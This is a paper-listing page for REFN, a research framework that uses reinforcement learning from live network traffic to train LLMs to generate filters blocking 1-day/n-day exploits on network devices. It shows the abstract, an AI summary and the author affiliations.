REFN: A Reinforcement-Learning-From-Network Framework against 1-day/n-day Exploitations

๐Ÿ“… 2025-08-14
๐Ÿ“ˆ Citations: 0
โœจ Influential: 0
๐Ÿ“„ PDF
๐Ÿค– AI Summary
Defending against 1-day/n-day exploit attacks on network devices remains challenging due to poor cross-device scalability, low legacy-system compatibility, and error-prone manual deployment of existing host patching and network filtering solutions. Method: This paper proposes REFN, a novel network-driven reinforcement learning framework that leverages real-time traffic as an online reward signal to guide a large language model (LLM) in autonomously generating precise network filtering rules. REFN integrates proxy-based RAG knowledge distillation to enhance vulnerability semantic understanding, employs a VNF pipeline for end-to-end โ€œlanguage-to-network-policyโ€ translation, and incorporates an online proxy verification mechanism to mitigate LLM hallucination. Contribution/Results: Evaluated across 22 real-world attack scenarios, REFN achieves a 21.1% accuracy improvement over state-of-the-art methods, reduces mean remediation time to 3.65 hours, and scales seamlessly to tens of thousands of heterogeneous network devices.

Technology Category

Application Category

๐Ÿ“ Abstract
The exploitation of 1 day or n day vulnerabilities poses severe threats to networked devices due to massive deployment scales and delayed patching (average Mean Time To Patch exceeds 60 days). Existing defenses, including host based patching and network based filtering, are inadequate due to limited scalability across diverse devices, compatibility issues especially with embedded or legacy systems, and error prone deployment process (manual patch validation). To address these issues, we introduce REFN (Reinforcement Learning From Network), a novel framework that trains Large Language Models (LLMs) to autonomously generate network filters to prevent 1 day or n day exploitations. REFN ensures scalability by uniquely employs Reinforcement Learning (RL) driven by online network rewards instead of traditional Human Feedback (RLHF). REFN guarantees compatibility via unified deployment on edge security gateways (Amazon Eero). REFN provides robustness via online validation using real network traffic. Crucially, REFN addresses three core challenges in training LLMs for exploit prevention: 1) expanding current LLMs limited vulnerability fixing expertise via Agentic RAG based Knowledge Distillation, 2) bridging current LLMs language to network gaps through an RL From VNF Pipeline that translates language context (vulnerability description) into network enforcement, 3) addressing the LLM hallucination and non determinism via the Online Agentic Validation that penalizes erroneous outputs. Evaluated across 22 families of 1 day or n day exploits, REFN demonstrates effectiveness (21.1 percent higher accuracy than alternatives), efficiency (Mean Time To Patch of 3.65 hours) and scalability (easily scale to 10K devices). REFN serves as an initial step toward training LLMs to rapidly prevent massive scale 1 day or n day exploitations.
Problem

Research questions and friction points this paper is trying to address.

Addresses delayed patching and scalability in networked devices
Ensures compatibility with diverse and legacy systems
Improves accuracy and speed of exploit prevention
Innovation

Methods, ideas, or system contributions that make the work stand out.

Uses Reinforcement Learning for network filter generation
Deploys unified edge gateways for compatibility
Employs online validation to ensure robustness
๐Ÿ”Ž Similar Papers
No similar papers found.
Tianlong Yu
Tianlong Yu
CMU
L
Lihong Liu
School of Artificial Intelligence, Hubei University, Wuhan, China
Z
Ziyi Zhou
School of Artificial Intelligence, Hubei University, Wuhan, China
F
Fudu Xing
University of Southern California, Los Angeles, USA
K
Kailong Wang
Huazhong University of Science and Technology, Wuhan, China
Y
Yang Yang
School of Artificial Intelligence, Hubei University, Wuhan, China